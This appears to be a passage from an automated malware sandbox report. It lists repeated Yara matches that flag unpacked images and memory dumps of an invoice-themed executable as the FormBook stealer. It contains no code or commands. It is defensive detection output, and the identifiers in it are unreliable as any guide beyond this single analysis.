Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Order No00020212910.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Order No00020212910.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Order No00020212910.exe.3cffe30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.360093784.00000000012A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.358557026.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.359113486.0000000000F30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.286837768.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538894457.0000000002DB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.331858706.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.538763652.0000000002D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290527525.0000000003BD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.537812655.0000000000B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.317344096.000000000FC45000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.287427426.0000000000400000.00000040.00000001.sdmp, type: MEMORY